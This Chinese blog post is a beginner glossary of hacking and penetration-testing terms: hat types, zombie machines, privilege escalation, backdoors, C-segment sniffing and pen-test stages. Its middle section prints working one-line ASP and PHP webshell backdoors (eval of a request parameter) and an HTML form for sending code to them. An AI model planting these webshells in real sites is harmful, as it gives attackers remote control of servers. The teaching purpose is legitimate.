下面正式开始学习黑客攻防的技术,从此你也踏上了一条“不归路”,既然对黑客有兴趣,那就请坚持下去,最后你会不一样和所有人
渗透测试相关概念
黑客(Cracker):技术高,纵横于网络上的高级程序员
骇客:技术可能一般,工具使用的好
红客(Honcker):中国特色红客
白帽子:从事网络安全,系统安全
黑帽子:研究木马,操作系统,寻找漏洞,个人意志
灰帽子:研究木马,操作系统,寻找漏洞,出发点主要是个人意志(自由性强)
1.脚本(asp,php,jsp)
2.html(css,js,html)
3.HTTP协议
4.CMS(B/S)
5.MD5
肉鸡:被黑客入侵并被长期驻扎的计算机或服务器
抓鸡:利用使用大量的程序漏洞,使用自动化方式获取肉鸡的行为
Webshell:痛过Web入侵的脚本工具,对网站服务进行一定程度的控制
漏洞:硬件,软件,协议等可利用的安全缺陷
一句话木马:痛过向服务端提交一句简短的代码,
配合本地客户端实现webshell功能的木马
<%eval request(“pass”)%>
<%execute(request(“pass”))%>
request(“pass”)接收客户端提交的数据,pass为执行命令的参数值
eval/execute 函数执行客户端命令的内容
PHP一句话木马:<?php eval($_POST[cracer]);?>
<form method=post action=”http://木马地址”>
<textarea name=cracer>
//php代码
phpinfo();
</textarea>
<input type=submit>
</form>
提权:操作系统低权限的账户将自己提升为管理员权限使用的方法。
后门:对主机长期控制,在机器上种植的一段程序或留下的一个“入口”
跳板:使用肉鸡IP来实施攻击其他目标,隐藏自己的身份信息(使用别人电脑)
旁站入侵:同服务器下的网站入侵,通过提权跨目录拿网站权限;
常用的旁站查询工具:WebRobot,御剑,明小子,web在线查询
C段入侵:同C段下服务器入侵,如192.168.1.253入侵192.168.1.*任意一台机器,通过嗅探获取信息
常用的工具有:在windows下Cain,在UNIX下Sniffit,Snoop,Tcpdump,Dsniff等
黑盒测试:未授权的情况下,模拟黑客的攻击方法和思维方式
黑盒测试能力:OS,Database,Script,code,思路,社工
白盒测试:从内部发起
APT攻击(Advanced Persistent Threat):高级可持续性攻击,政府和组织
渗透测试流程:
明确目标(确定范围,确定规则,确定需求)
收集信息(基础信息,系统信息,应用信息,版本信息,服务信息,人员信息,防护信息)
漏洞探测(系统漏洞,WebServer漏洞,Web应用漏洞,其他端口服务漏洞,通信安全)
漏洞验证(自动化验证,手工验证,试验验证,登陆猜解,业务漏洞验证,公开资源的利用)
形成报告(精准打击,绕过防御机制,定制攻击路径,绕过检测机制,攻击代码)
信息整理(实施攻击,获取内部信息,进一步渗透,持续性存在,清理痕迹)
获取所需(整理渗透工具,整理收集信息)
信息分析
搜索信息是关键
搜集0day(破解信息漏洞等)
安装虚拟机(在电脑知识——>虚拟机中有介绍)
这才刚刚开始,第一步已经坚持了,那么继续走下去……
Latest posts by zchao (see all)
- Auraでアクションボタン作成して画面のチェックボックス項目一括処理 - 2021年4月12日
- デフォルト項目値を含むレコード作成実例説明(defaultFieldValues) - 2021年1月9日
- Salesforce のノーコード・ローコード開発 - 2020年12月31日
转载请注明:zchao博客之家 » 黑客攻防之渗透测试相关术语解析
